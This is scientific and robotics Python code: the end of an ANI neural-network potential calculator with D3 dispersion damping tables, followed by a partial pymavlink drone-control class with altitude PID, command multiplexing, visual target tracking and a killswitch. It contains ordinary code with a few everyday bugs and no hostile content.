if 'forces' in properties:
self.results['forces'] = self.energy_conversion * self.results['forces']
### NL Update function now handled internally ###
def __update_neighbors(self):
for a in range(0, len(self.atoms)):
indices, offsets = self.nlR.get_neighbors(a)
self.nc.setNeighbors(ind=a, indices=indices.astype(np.int32), offsets=offsets.astype(np.float32))
### Return the atomic energies (in eV) ###
def get_atomicenergies(self, atoms=None, properties=['energy'],
system_changes=all_changes,sae=False):
Calculator.calculate(self, atoms, properties, system_changes)
## make up for stress
## TODO
stress_ani = np.zeros((1, 3))
if self.Setup or self.nc.request_setup():
# Setup molecule for MD
natoms = len(self.atoms)
atom_symbols = self.atoms.get_chemical_symbols()
xyz = self.atoms.get_positions()
self.nc.setMolecule(coords=xyz.astype(np.float32), types=atom_symbols)
self.Setup = False
else:
xyz = self.atoms.get_positions()
# Set the conformers in NeuroChem
self.nc.set_coordinates(xyz.astype(np.float32))
E = self.nc.compute_energies()
return self.nc.compute_aenergies(sae) * conv_au_ev
##--------------------------------------------------------------
## Easy loader for ANI networks in python interface
##--------------------------------------------------------------
def aniensloader(model, gpu=0, multigpu=False):
# Set locations of all required network files
wkdir = model.rsplit('/', 1)[0] + '/' # Note the relative path
data = np.loadtxt(model, dtype=str)
cnstfile = wkdir + data[0] # AEV parameters
saefile = wkdir + data[1] # Atomic shifts
nnfdir = wkdir + data[2] # network prefix
Nn = int(data[3]) # Number of networks in the ensemble
if multigpu:
if not isinstance(gpu, list):
raise ValueError('When running on multiple GPUs please supply the GPU indices in a list.')
return ensemblemolecule_multigpu(cnstfile, saefile, nnfdir, Nn, gpu)
else:
return ensemblemolecule(cnstfile, saefile, nnfdir, Nn, gpu)
###
# ANI with D3 correction
##
if d3present:
d3_calc = d3.d3_calc
alp = 14.
# D3 damping parameters
# (RS6 , S18 , RS18 , S6 )
damp0 = {
'ani': (1.281, 1.0940, 1.000, 1.00),
'slater-dirac-exchange': (0.999, -1.957, 0.697, 1.00),
'b-lyp': (1.094, 1.6820, 1.000, 1.00),
'b-p': (1.139, 1.6830, 1.000, 1.00),
'b97-d': (0.892, 0.9090, 1.000, 1.00),
'revpbe': (0.923, 1.0100, 1.000, 1.00),
'pbe': (1.217, 0.7220, 1.000, 1.00),
'pbesol': (1.345, 0.6120, 1.000, 1.00),
'rpw86-pbe': (1.224, 0.9010, 1.000, 1.00),
'rpbe': (0.872, 0.5140, 1.000, 1.00),
'tpss': (1.166, 1.1050, 1.000, 1.00),
'b3-lyp': (1.261, 1.7030, 1.000, 1.00),
'pbe0': (1.287, 0.9280, 1.000, 1.00),
'hse06': (1.129, 0.1090, 1.000, 1.00),
'revpbe38': (1.021, 0.8620, 1.000, 1.00),
'pw6b95': (1.532, 0.8620, 1.000, 1.00),
'tpss0': (1.252, 1.2420, 1.000, 1.00),
'b2-plyp': (1.427, 1.0220, 1.000, 0.64),
'pwpb95': (1.557, 0.7050, 1.000, 0.82),
'b2gp-plyp': (1.586, 0.7600, 1.000, 0.56),
'ptpss': (1.541, 0.8790, 1.000, 0.75),
'hf': (1.158, 1.7460, 1.000, 1.00),
'mpwlyp': (1.239, 1.0980, 1.000, 1.00),
'bpbe': (1.087, 2.0330, 1.000, 1.00),
'bh-lyp': (1.370, 1.4420, 1.000, 1.00),
'tpssh': (1.223, 1.2190, 1.000, 1.00),
'pwb6k': (1.660, 0.5500, 1.000, 1.00),
'b1b95': (1.613, 1.8680, 1.000, 1.00),
'bop': (0.929, 1.9750, 1.000, 1.00),
'o-lyp': (0.806, 1.7640, 1.000, 1.00),
'o-pbe': (0.837, 2.0550, 1.000, 1.00),
'ssb': (1.215, 0.6630, 1.000, 1.00),
'revssb': (1.221, 0.5600, 1.000, 1.00),
'otpss': (1.128, 1.4940, 1.000, 1.00),
'b3pw91': (1.176, 1.7750, 1.000, 1.00),
'revpbe0': (0.949, 0.7920, 1.000, 1.00),
'pbe38': (1.333, 0.9980, 1.000, 1.00),
'mpw1b95': (1.605, 1.1180, 1.000, 1.00),
'mpwb1k': (1.671, 1.0610, 1.000, 1.00),
'bmk': (1.931, 2.1680, 1.000, 1.00),
'cam-b3lyp': (1.378, 1.2170, 1.000, 1.00),
'lc-wpbe': (1.355, 1.2790, 1.000, 1.00),
'm05': (1.373, 0.5950, 1.000, 1.00),
'm052x': (1.417, 0.0000, 1.000, 1.00),
'm06l': (1.581, 0.0000, 1.000, 1.00),
'm06': (1.325, 0.0000, 1.000, 1.00),
'm062x': (1.619, 0.0000, 1.000, 1.00),
'm06hf': (1.446, 0.0000, 1.000, 1.00),
'dftb3': (1.235, 0.6730, 1.000, 1.00),
'hcth120': (1.221, 1.2060, 1.000, 1.00),
}
# D3(BJ) damping parameters
# (RS6 , S18 , RS18 , S6 )
dampbj = {
'ani': (0.48310, 2.00770, 4.5323, 1.00),
'b-p': (0.39460, 3.28220, 4.8516, 1.00),
'b-lyp': (0.42980, 2.69960, 4.2359, 1.00),
'revpbe': (0.52380, 2.35500, 3.5016, 1.00),
'rpbe': (0.18200, 0.83180, 4.0094, 1.00),
'b97-d': (0.55450, 2.26090, 3.2297, 1.00),
'pbe': (0.42890, 0.78750, 4.4407, 1.00),
'rpw86-pbe': (0.46130, 1.38450, 4.5062, 1.00),
'b3-lyp': (0.39810, 1.98890, 4.4211, 1.00),
'tpss': (0.45350, 1.94350, 4.4752, 1.00),
'hf': (0.33850, 0.91710, 2.8830, 1.00),
'tpss0': (0.37680, 1.25760, 4.5865, 1.00),
'pbe0': (0.41450, 1.21770, 4.8593, 1.00),
'hse06': (0.38300, 2.31000, 5.6850, 1.00),
'revpbe38': (0.43090, 1.47600, 3.9446, 1.00),
'pw6b95': (0.20760, 0.72570, 6.3750, 1.00),
'b2-plyp': (0.30650, 0.91470, 5.0570, 0.64),
'dsd-blyp': (0.00000, 0.21300, 6.0519, 0.50),
'dsd-blyp-fc': (0.00090, 0.21120, 5.9807, 0.50),
'bop': (0.48700, 3.29500, 3.5043, 1.00),
'mpwlyp': (0.48310, 2.00770, 4.5323, 1.00),
'o-lyp': (0.52990, 2.62050, 2.8065, 1.00),
'pbesol': (0.44660, 2.94910, 6.1742, 1.00),
'bpbe': (0.45670, 4.07280, 4.3908, 1.00),
'opbe': (0.55120, 3.38160, 2.9444, 1.00),
'ssb': (-0.0952, -0.1744, 5.2170, 1.00),
'revssb': (0.47200, 0.43890, 4.0986, 1.00),
'otpss': (0.46340, 2.74950, 4.3153, 1.00),
'b3pw91': (0.43120, 2.85240, 4.4693, 1.00),
'bh-lyp': (0.27930, 1.03540, 4.9615, 1.00),
'revpbe0': (0.46790, 1.75880, 3.7619, 1.00),
'tpssh': (0.45290, 2.23820, 4.6550, 1.00),
'mpw1b95': (0.19550, 1.05080, 6.4177, 1.00),
'pwb6k': (0.18050, 0.93830, 7.7627, 1.00),
'b1b95': (0.20920, 1.45070, 5.5545, 1.00),
'bmk': (0.19400, 2.08600, 5.9197, 1.00),
'cam-b3lyp': (0.37080, 2.06740, 5.4743, 1.00),
'lc-wpbe': (0.39190, 1.85410, 5.0897, 1.00),
'b2gp-plyp': (0.00000, 0.25970, 6.3332, 0.56),
'ptpss': (0.00000, 0.28040, 6.5745, 0.75),
'pwpb95': (0.00000, 0.29040, 7.3141, 0.82),
'hf/mixed': (0.56070, 3.90270, 4.5622, 1.00),
'hf/sv': (0.42490, 2.18490, 4.2783, 1.00),
'hf/minis': (0.17020, 0.98410, 3.8506, 1.00),
'b3-lyp/6-31gd': (0.50140, 4.06720, 4.8409, 1.00),
'hcth120': (0.35630, 1.08210, 4.3359, 1.00),
'dftb3': (0.74610, 3.20900, 4.1906, 1.00),
}
# Class of ANI + D3 energies
class ANID3(Calculator):
implemented_properties = ['energy', 'forces', 'stress']
default_parameters = {'xc': 'ani',
'bj': True,
'threebody': True,
'rcut': 95 * Bohr,
'rcutcn': 40 * Bohr,
'rs6': None,
's18': None,
'rs18': None,
's6': None,
'calculator': None}
nolabel = True
def __init__(self, build=True, gpuid=0, reslist=[], **kwargs):
Calculator.__init__(self, **kwargs)
if build:
anipath = os.path.dirname(__file__)
cnstfile = anipath + '/../ANI-c08f-ntwk/rHCNO-4.6A_16-3.1A_a4-8.params'
saefile = anipath + '/../ANI-c08f-ntwk/sae_6-31gd.dat'
nnfdir = anipath + '/../ANI-c08f-ntwk/networks/'
self.nc = pync.molecule(cnstfile, saefile, nnfdir, gpuid)
self.Setup = True
self.reslist = reslist
def setnc(self, nc):
self.nc = nc
def calculate(self, atoms=None, properties=['energy'],
system_changes=all_changes):
Calculator.calculate(self, atoms, properties, system_changes)
xc = self.parameters.xc.lower()
bj = self.parameters.bj
threebody = self.parameters.threebody
rcut = self.parameters.rcut
rcutcn = self.parameters.rcutcn
calculator = self.parameters.calculator
if bj:
damp = dampbj
else:
damp = damp0
rs6 = s18 = rs18 = s6 = None
try:
rs6, s18, rs18, s6 = damp[xc]
except KeyError:
unknown_functional = True
else:
unknown_functional = False
if self.parameters.s6 is not None:
s6 = self.parameters.s6
if self.parameters.s18 is not None:
s18 = self.parameters.s18
if self.parameters.rs6 is not None:
rs6 = self.parameters.rs6
if self.parameters.rs18 is not None:
rs18 = self.parameters.rs18
if unknown_functional and None in (s6, s18, rs6, rs18):
raise ValueError("Unknown functional {}! \
Please specify damping parameters.".format(xc))
# D3 calculation part
energy_d3, forces_d3, stress_d3 = d3_calc(
self.atoms.get_atomic_numbers(),
self.atoms.get_cell(),
self.atoms.get_positions().T,
rcut=rcut,
rcutcn=rcutcn,
s6=s6,
s18=s18,
rs6=rs6,
rs18=rs18,
alp6=alp,
alp8=alp + 2,
pbc=self.atoms.get_pbc(),
bj=bj,
threebody=threebody)
## make up for stress
## TODO
stress_ani = np.zeros(6)
if self.Setup or self.nc.request_setup():
# Setup molecule for MD
natoms = len(self.atoms)
atom_symbols = self.atoms.get_chemical_symbols()
xyz = self.atoms.get_positions()
self.nc.setMolecule(coords=xyz.astype(np.float32), types=atom_symbols)
self.nc.setPBC(self.atoms.get_pbc()[0], self.atoms.get_pbc()[1], self.atoms.get_pbc()[2])
self.Setup = False
else:
xyz = self.atoms.get_positions()
# Set the conformers in NeuroChem
self.nc.setCoordinates(coords=xyz.astype(np.float32))
# TODO works only for 3D periodic. For 1,2D - update np.zeros((3,3)) part
pbc_inv = (np.linalg.inv(self.atoms.get_cell())).astype(np.float32) if atoms.pbc.all() else np.zeros((3, 3),
dtype=np.float32)
self.nc.setCell((self.atoms.get_cell()).astype(np.float32), pbc_inv)
# self.nc.setCell((self.atoms.get_cell()).astype(np.float32),(np.linalg.inv(self.atoms.get_cell())).astype(np.float32))
# start_time2 = time.time()
self.results['energy'] = conv_au_ev * self.nc.energy()[0] + energy_d3
if 'forces' in properties:
forces = -conv_au_ev * self.nc.force() + forces_d3.T
# restrain atoms
for i in self.reslist:
forces[i] = 0.0
self.results['forces'] = forces
self.results['stress'] = conv_au_ev * stress_ani + stress_d3.flat[[0, 4, 8, 5, 2, 1]]
# end_time2 = time.time()
# print('ANI Time:', end_time2 - start_time2)
def __update_neighbors(self):
# print('------------------------')
# szs = []
# an = self.atoms.get_atomic_numbers()
for a in range(0, len(self.atoms)):
indices, offsets = self.nlR.get_neighbors(a)
# if an[a] == 8:
# print(an[a])
# szs.append(len(indices))
self.nc.setNeighbors(ind=a, indices=indices.astype(np.int32), offsets=offsets.astype(np.float32))
# indices, offsets = self.nlR.get_neighbors(302)
# f = open('test2.xyz','w')
# f.write(str(len(indices))+'\n')
# f.write(" comment\n")
# an = self.atoms.get_atomic_numbers()
# for i, offset in zip(indices, offsets):
# xyz = self.atoms.positions[i]
# f.write(str(an[i]) + ' ' + str(xyz[0]) + ' ' + str(xyz[1]) + ' ' + str(xyz[2]) + '\n')
# print(szs)
# plt.hist(szs, max(szs)-min(szs), normed=1, facecolor='green', alpha=0.75)
# plt.xlabel('Number of neighbors')
# plt.ylabel('Count')
# plt.show()
# print('------------------------')
def get_atomicenergies(self, atoms=None, properties=['energy'],
system_changes=all_changes):
Calculator.calculate(self, atoms, properties, system_changes)
## make up for stress
## TODO
stress_ani = np.zeros((1, 3))
if self.Setup or self.nc.request_setup():
# Setup molecule for MD
natoms = len(self.atoms)
atom_symbols = self.atoms.get_chemical_symbols()
xyz = self.atoms.get_positions()
self.nc.setMolecule(coords=xyz.astype(np.float32), types=atom_symbols)
self.Setup = False
else:
xyz = self.atoms.get_positions()
# Set the conformers in NeuroChem
self.nc.setCoordinates(coords=xyz.astype(np.float32))
self.nc.energy()
return self.nc.aenergies(True) * conv_au_ev
class D3(Calculator):
implemented_properties = ['energy', 'forces', 'stress']
default_parameters = {'xc': 'ani',
'bj': True,
'threebody': True,
'rcut': 95 * Bohr,
'rcutcn': 40 * Bohr,
'rs6': None,
's18': None,
'rs18': None,
's6': None,
'calculator': None}
nolabel = True
def __init__(self, **kwargs):
Calculator.__init__(self, **kwargs)
def calculate(self, atoms=None, properties=['energy'],
system_changes=all_changes):
Calculator.calculate(self, atoms, properties, system_changes)
xc = self.parameters.xc.lower()
bj = self.parameters.bj
threebody = self.parameters.threebody
rcut = self.parameters.rcut
rcutcn = self.parameters.rcutcn
calculator = self.parameters.calculator
if bj:
damp = dampbj
else:
damp = damp0
rs6 = s18 = rs18 = s6 = None
try:
rs6, s18, rs18, s6 = damp[xc]
except KeyError:
unknown_functional = True
else:
unknown_functional = False
if self.parameters.s6 is not None:
s6 = self.parameters.s6
if self.parameters.s18 is not None:
s18 = self.parameters.s18
if self.parameters.rs6 is not None:
rs6 = self.parameters.rs6
if self.parameters.rs18 is not None:
rs18 = self.parameters.rs18
if unknown_functional and None in (s6, s18, rs6, rs18):
raise ValueError("Unknown functional {}! \
Please specify damping parameters.".format(xc))
energy, forces, stress = d3_calc(
self.atoms.get_atomic_numbers(),
self.atoms.get_cell(),
self.atoms.get_positions().T,
rcut=rcut,
rcutcn=rcutcn,
s6=s6,
s18=s18,
rs6=rs6,
rs18=rs18,
alp6=alp,
alp8=alp + 2,
pbc=self.atoms.get_pbc(),
bj=bj,
threebody=threebody)
self.results['energy'] = energy
self.results['forces'] = forces.T
self.results['stress'] = stress.flat[[0, 4, 8, 5, 2, 1]]
if calculator is not None:
calculate(self.atoms)
self.results['energy'] += calculator.results['energy']
self.results['forces'] += calculator.results['forces']
self.results['stress'] += calculator.results['stress']
|
Drone.py | import time
from pymavlink import mavutil
import matplotlib.pyplot as plt
import threading
import math
from pynput import keyboard
import os
from src.dronevision_library import visual_algorithm
import numpy
class Drone:
def __init__(self, connection_string, alt_type="barometer", scantime=0, color='white'):
print("Connecting...")
try:
self.vehicle = mavutil.mavlink_connection(connection_string, force_connected=True, baud=57600)
self.vehicle.wait_heartbeat()
print("Successfully connected to system", self.vehicle.target_system)
except TimeoutError:
print("Failed to connect")
self.interrupt()
self.lock = threading.Lock()
self.commands = {}
self.controller = Controller(self)
self.functions = {'set_throttle': self.set_throttle, 'set_mode': self.set_mode,
'recv_msg': self.recv_msg, 'param_request_read': self.param_request_read,
'manual_control': self.controller.manual_control}
self.output = {}
self.execute(func=self.multiplexer, args=(), daemon=True)
self.execute(func=self.read_message, args=(), daemon=True)
# waits until the script starts receiving messages
while not self.heartbeat:
time.sleep(0.1)
self.hold_alt = False
self.alt_hold_throttle = 50
self.target = []
self.scan = False
self.start_pressure = 0
self.alt_type = alt_type
self.flightmode = self.get_mode(1)
self.disable_gps()
self.execute(func=self.alt_hold, args=(), daemon=True)
self.execute(func=self.get_target, args=(scantime, color), daemon=True)
self.hover_throttle = None
def arm(self):
"""Arms the drone."""
self.controller.load_parameters()
self.hover_throttle = self.get_parameter(b'MOT_THST_HOVER', 1)['param_value']
#Sets the mode to stabilize before arming since the drone is not armable in some modes
self.mode('STABILIZE', 10)
self.vehicle.arducopter_arm()
print("Arming drone...")
#Wait for the drone to be armed
while True:
if self.armed:
break
time.sleep(0.5)
print("Drone is armed")
@property
def armed(self):
"""Returns whether the drone is armed or not."""
heartbeat = self.heartbeat[-1]
if heartbeat['base_mode'] == 209:
return True
elif heartbeat['base_mode'] == 81:
return False
else:
print("Unknown state")
def disarm(self):
"""Disarms the drone. Can only be done when not airborne."""
time.sleep(1)
while True:
self.vehicle.arducopter_disarm()
if not self.armed:
break
time.sleep(0.5)
def arm_and_takeoff(self, alt):
"""Arms and requests the drone to take off."""
self.arm()
self.change_alt(alt, kp=15, ki=4, kd=0, l_limit=30, u_limit=70)
print("Altitude reached")
def disable_gps(self):
"""Changes certain parameters to disable the usage of the gps."""
self.vehicle.param_set_send('ATT_ACC_COMP', 0, mavutil.mavlink.MAVLINK_TYPE_INT32_T)
self.vehicle.param_set_send('ATT_MAG_DECL_A', 0, mavutil.mavlink.MAVLINK_TYPE_INT32_T)
self.vehicle.param_set_send('EKF2_AID_MASK', 5.60519385729926828369491833316E-45,
mavutil.mavlink.MAVLINK_TYPE_INT32_T)
def mode(self, flightmode, priority):
"""Changes the flightmode of the drone."""
print("Setting flightmode...")
self.multiplexer_add('set_mode', param1=flightmode, priority=priority)
while self.flightmode != ('COPTER_MODE_' + flightmode):
time.sleep(0.2)
self.flightmode = self.get_mode(1)
def set_mode(self, flightmode):
"""Sends the command to change the flightmode."""
self.vehicle.set_mode(flightmode)
def get_mode(self, priority):
"""Returns the mode of the drone."""
heartbeat = self.heartbeat[-1]
custom_mode = heartbeat['custom_mode']
return mavutil.mavlink.enums['COPTER_MODE'][custom_mode].name
def ack_command(self, priority):
"""Provides feedback about the command that was sent.
Outputs either that the command was received and executed, received but still waiting to execute or was not
executed.
"""
ack_msg = self.get_message('COMMAND_ACK', True, priority=priority)
return mavutil.mavlink.enums['MAV_RESULT'][ack_msg['result']].description
def baro_altitude(self, priority):
"""Returns the altitude of the drone based on the barometer."""
# sets the pressure of the initial position if it has not been done before
if self.start_pressure == 0:
self.start_pressure = self.get_pressure(priority)
# calculates the pressure using the formula used by ArduPilot itself
# see https://discuss.ardupilot.org/t/estimating-gps-vs-baro-height-some-thoughts/25952/5 for more information
pressure = self.get_pressure(priority)
scaling = pressure / self.start_pressure
temp = 293.15
altitude = 153.8462 * temp * (1.0 - math.exp(0.190259 * math.log(scaling)))
return altitude
def get_pressure(self, priority):
"""Returns the pressure measured by the barometer."""
scaled_pressure = self.scaled_pressure[-1]
return scaled_pressure['press_abs']
def get_message(self, msg, blocking, priority=0):
"""Sends commands to request messages from the drone."""
message = self.recv_msg(msg, blocking)
message = message.to_dict()
return message
def read_message(self):
"""Reads every message sent by the drone and stores it in the corresponding list."""
# Defining all the required lists
self.heartbeat = []
self.attitude = []
self.scaled_pressure = []
self.gps_raw_int = []
self.param_value = []
self.scaled_imu2 = []
self.servo_output_raw = []
self.ack_comm = []
self.local_position_ned = []
self.rc_channels = []
while True:
message = self.vehicle.recv_match()
if not message:
continue
# checks which message it received and adds it to the corresponding list
if message.name == 'HEARTBEAT':
self.heartbeat.append(message.to_dict())
elif message.name == 'ATTITUDE':
self.attitude.append(message.to_dict())
elif message.name == 'SCALED_PRESSURE':
self.scaled_pressure.append(message.to_dict())
elif message.name == 'GPS_RAW_INT':
self.gps_raw_int.append(message.to_dict())
elif message.name == 'PARAM_VALUE':
self.param_value.append(message.to_dict())
elif message.name == 'SCALED_IMU2':
self.scaled_imu2.append(message.to_dict())
elif message.name == 'SERVO_OUTPUT_RAW':
self.servo_output_raw.append(message.to_dict())
elif message.name == 'ACK_COMMAND':
self.ack_comm.append(message.to_dict())
elif message.name == 'LOCAL_POSITION_NED':
self.local_position_ned.append(message.to_dict())
elif message.name == 'RC_CHANNELS':
self.rc_channels.append(message.to_dict())
def change_alt(self, alt, kp=1, ki=1, kd=1, l_limit=40, u_limit=60, epsilon=0.05, debug=False):
"""Commands the drone to fly to the desired altitude without GPS.
Parameters:
alt (float): target altitude
kp (int): proportional gain
ki (int): integral gain
kd (int): derivative gain
l_limit (float): minimum output value of the PID
u_limit (float): maximum output value of the PID
epsilon (float): allowed error for the altitude
debug (bool): True to print and plot output for debugging
"""
timer = 0
# variables for plotting
height = []
setpoint = []
time_l = []
p_l = []
i_l = []
d_l = []
thr_l = []
start_time = time.monotonic()
pid = PID(kp, ki, kd, setpoint=alt, output_limits=(l_limit, u_limit))
self.mode('ALT_HOLD', 10)
while True:
# calculate and request a new throttle setting
curr_alt = self.get_altitude(2) #/1000
throttle = pid(curr_alt)
self.set_throttle(throttle, priority=5)
# used for debugging
if debug:
time_l.append(time.monotonic() - start_time)
p, i, d = pid.components
height.append(curr_alt)
setpoint.append(alt)
p_l.append(p)
i_l.append(i)
d_l.append(d)
thr_l.append(throttle)
# the drone holds its altitude after staying around the target altitude for a certain amount of time
if alt - epsilon < curr_alt < alt + epsilon:
timer += 1
if timer == 3 * (0.1 / 0.01):
if self.flightmode == 'COPTER_MODE_STABILIZE':
self.alt_hold_throttle = self.hover_throttle
elif self.flightmode =='COPTER_MODE_ALT_HOLD':
self.alt_hold_throttle = 50
self.hold_alt = True
break
else:
timer = 0
# used for debugging
if debug:
# Plot the altitude in function of time
plt.figure(1)
plt.plot(time_l, height)
plt.plot(time_l, setpoint, "r--")
plt.xlabel("time [s]")
plt.ylabel("height [m]")
plt.title("takeoff behaviour")
# Plot the output from the PID in function of time
plt.figure(2)
plt.plot(time_l, p_l, color="red", label="Proportional")
plt.plot(time_l, i_l, color="green", label="Integral")
plt.plot(time_l, d_l, color="blue", label="Differential")
plt.plot(time_l, thr_l, color="black", label="Throttle")
plt.legend()
plt.xlabel("time [s]")
plt.ylabel("Throttle [%]")
plt.title("PID behaviour")
plt.show()
def set_throttle(self, throttle, priority):
"""Requests the desired throttle setting.
Parameters:
throttle (float): throttle setting in %
"""
self.controller.throttle = throttle
self.controller(priority=priority)
def multiplexer(self):
"""Selects which command to send to the drone based on priority."""
while True:
with self.lock:
no_commands = len(self.commands)
# starts looping as soon as a command is requested
if no_commands > 0:
# determine the command with the highest priority
next_prio = 0
next_command = None
commands = self.commands
for c in commands:
if commands[c][0] > next_prio:
next_prio = commands[c][0]
next_command = c
if next_command is not None:
p = commands[next_command]
if next_prio != 0:
# in case of a command requesting output from the drone, the output is saved to an attribute
if next_command == "recv_msg":
msg = self.functions[next_command](p[1], p[2])
if msg is not None:
self.output[p[1]] = msg
else:
# determines the number of parameters of the command
no_param = 0
while p[no_param] is not None:
no_param += 1
no_param -= 1 # subtract 1 since the priority is not a relevant parameter
# executes the command based on the number of parameters
if no_param == 0:
self.functions[next_command]()
elif no_param == 1:
self.functions[next_command](p[1])
elif no_param == 2:
self.functions[next_command](p[1], p[2])
elif no_param == 3:
self.functions[next_command](p[1], p[2], p[3])
elif no_param == 4:
self.functions[next_command](p[1], p[2], p[3], p[4])
elif no_param == 5:
self.functions[next_command](p[1], p[2], p[3], p[4], p[5])
elif no_param == 6:
self.functions[next_command](p[1], p[2], p[3], p[4], p[5], p[6])
self.commands[next_command][0] = 0 # sets the priority of the executed command to 0
# increments the priority of every requested command, to prevent commands with a high priority
# to only be executed
for command in self.commands:
if self.commands[command][0] != 0:
self.commands[command][0] += 1
def multiplexer_add(self, comm, param1=None, param2=None, param3=None, param4=None, param5=None, param6=None,
priority=0):
"""Adds the requested command to the commands dictionary."""
with self.lock:
# the order of the parameters must be identical to the order of the arguments of the requested function
self.commands[comm] = [priority, param1, param2, param3, param4, param5, param6]
@staticmethod
def execute(func, args, daemon=False):
""""Executes the function in a new thread.
Parameters:
func (function): the function to be run in the new thread
args (tuple): contains the required arguments
daemon (bool): determines whether the program waits for the completion of the thread before finishing
or not, false or true respectively
"""
thread = threading.Thread(target=func, args=args, daemon=daemon)
thread.start()
def get_parameter(self, parameter, priority):
"""Returns the requested parameter."""
self.multiplexer_add('param_request_read', parameter, priority=priority)
return self.get_message('PARAM_VALUE', True, priority=priority)
def param_request_read(self, parameter):
"""Sends a request to the drone to send the information of a parameter."""
self.vehicle.mav.param_request_read_send(self.vehicle.target_system, self.vehicle.target_component, parameter,
-1)
def land(self, throttle_decrement=5):
""""Causes the drone to land without GPS."""
self.hold_alt = True
if self.flightmode == 'COPTER_MODE_STABILIZE':
self.alt_hold_throttle = self.hover_throttle - throttle_decrement
elif self.flightmode == 'COPTER_MODE_ALT_HOLD':
self.alt_hold_throttle = 50 - throttle_decrement
az = []
start_time = time.monotonic()
while True:
# reads and stores the vertical acceleration
imu = self.scaled_imu2[-1]
az.append(imu['zacc'])
# when a spike in acceleration is measured, the drone has touched the ground and the drone can disarm
if az[-1] < -1010:
break
self.hold_alt = False
def recv_msg(self, msg_type, blocking):
"""Receive a message from the drone."""
return self.vehicle.recv_match(type=msg_type, blocking=blocking)
def alt_hold(self):
"""Repeatedly sends commands to hold altitude."""
while True:
if self.hold_alt:
self.set_throttle(self.alt_hold_throttle, priority=1)
else:
time.sleep(0.5)
def sonar_altitude(self, priority):
"""Returns the altitude measured by the sonar, assuming the sonar is pointing downwards."""
distance_sensor = self.distance_sensor[-1]
return distance_sensor['current_distance']
def gps_altitude(self, priority):
"""Returns the altitude based on the GPS."""
local_position = self.local_position_ned[-1]
return local_position['z']
def get_altitude(self, priority):
"""Returns the altitude.
The type of sensor used to measure altitude is defined when creating a Drone object.
"""
if self.alt_type.lower() == "barometer":
return self.baro_altitude(priority)
elif self.alt_type.lower() == "sonar":
return self.sonar_altitude(priority)
elif self.alt_type.lower() == "gps":
return self.gps_altitude(priority)
else:
print("Invalid method of measuring altitude")
def get_target(self, scantime, color, debug=False, source=''):
"""Stores the current distance and the current angle relative to the drone
Parameters:
scantime (float): the time to scan for objects after which it returns the output
color (str): the color to be detected
debug (bool): True will show white bounding around detected object every 2 seconds
source (str): the source image
"""
# when enabled, will continuously detect the object
while True:
if self.scan:
distance, angle = visual_algorithm(scantime, safezonesize, color, debug, source)
self.target.append((distance, angle))
else:
time.sleep(0.5)
def yaw_to_target(self, angle):
"""Orders the drone to rotate to the target.
The drone will rotate so it can either fly towards the target by pitching or so it can fly towards the target
by rolling, whichever requires the least amount of rotation.
"""
# checks in which quadrant the target is located and rotates acoordingly
if -45 <= angle <= 45:
self.yaw(angle)
self._x_target = True
elif 45 < angle < 135:
self.yaw(90 - angle)
self._x_target = False
elif 135 <= angle <= -135:
self.yaw(180 - angle)
self._x_target = True
elif -135 < angle < -45:
self.yaw(-90 - angle)
self._x_target = False
def go_to_target(self, kp, f = 0.05, p_w = 1*10**-6, p_h = 1*10**-6):
"""Commands the drone to fly towards the detected target.
Based on Image Based Visual Servoing, the required angle to fly towards the target is calculated to realise
speed control.
Parameters:
kp (int): proportional term
f (float): focal distance of the camera
p_w (float): pixel width
p_h (float): pixel height
"""
z = self.get_altitude(2)
self.yaw_to_target(self.target[-1][1])
# continously calculates the required angle needed to fly towards the target
while True:
u = 0
v = 0
pe = []
# checks whether the target is aligned along the roll or pitch axis, respectively
if self._x_target:
u = self.target[-1][0]
pe = [[-u], [0]]
elif not self._x_target:
v = self.target[-1][0]
pe = [[0],[-v]]
# jacobian matrix
jp = [[-f/(p_w * z), 0, u/z, (p_w * u * v)/f, -(f**2 + (p_w*u)**2) / (p_w*f), v],
[0, -f/(p_h * z), 0, 0, -(p_h * u * v) / f, -u]]
i_jp = numpy.linalg.pinv(jp) # inverse of the jacobian matrix
velocity = kp * numpy.dot(i_jp, pe)
angle = 4000 * velocity
if self._x_target:
self.pitch(angle[0][0])
elif not self._x_target:
self.roll(angle[1][0])
def interrupt(self):
"""Starts a listener to act as a killswitch for the drone and the script."""
def on_press(key):
if key == keyboard.KeyCode.from_char('k'):
self.vehicle.mav.command_long_send(self.vehicle.target_system, self.vehicle.target_component,
mavutil.mavlink.MAV_CMD_DO_FLIGHTTERMINATION, 0, 1, 0, 0, 0, 0, 0, 0)
os._exit(1)
listener = keyboard.Listener(on_press=on_press)
listener.start()
def pitch(self, angle):
"""Commands the drone to pitch to the desired angle."""
self.controller.pitch = angle
def roll(self, angle):
"""Commands the drone to roll to the desired angle."""
self.controller.roll = angle
def yaw(self, angle):
"""Commands the drone to yaw to the desired angle relative to its current heading."""
self.controller.yaw = angle
# waits until the drone has reached its correct heading
while True:
time.sleep(0.5)
if not self.controller.rotating:
break
class Controller():
"""The class that is used to control the movement of the drone."""
def __init__(self, drone):
self.drone = drone
self.throttle = 0
self.pitch = 0
self.roll = 0
self.yaw = 0
self.rotating = False # attribute used to indicate whether the drone is rotating or not
self.error = 0
self._timer = 0
def __call__(self, priority=1):
"""Calls the controller to send a request for controlling the drone using the attitude and throttle settings
defined in the arguments of the object."""
# only calculates the yaw rate when the desired yaw has changed or when the drone is still rotating
if self.yaw != 0 or self.rotating:
yaw = self.yaw_rate(self.yaw)
else:
yaw = 0
self.drone.multiplexer_add('manual_control', self.pitch, self.roll, self.throttle, int(yaw), priority=priority)
def load_parameters(self):
"""Loads all the necessary parameters."""
self.angle_max = (self.drone.get_parameter(b'ANGLE_MAX', 1)['param_value'] / 100)
self.yaw_p = 15
def manual_control(self, pitch=0, roll=0, throttle=0, yaw=0, buttons=0):
"""Sends the desired pitch, roll, yaw rate and throttle to the drone."""
pitch = int((pitch / self.angle_max) * 1000)
roll = int((roll / self.angle_max) * 1000)
thr = int((throttle / 100) * 1000)
self.drone.vehicle.mav.manual_control_send(self.drone.vehicle.target_system, pitch, roll, thr, yaw, buttons)
def yaw_rate(self, yaw):
"""Is used to determine the needed yaw rate to rotate to the desired angle."""
hdg_rad = self.drone.attitude[-1]['yaw']
hdg_deg = hdg_rad * (180 / math.pi)
# sets the yaw attribute to zero when calculating the yaw rate for the first time
if yaw != 0:
self._des_hdg_deg = hdg_deg + yaw
self.yaw = 0
self.rotating = True
self.error = self._des_hdg_deg - hdg_deg
# if the drone stays within a certain margin for a certain period of time, the rotation is completed
if -5 < self.error < 5:
self._timer += 1
if self._timer == 50:
self.rotating = False
self._timer = 0
else:
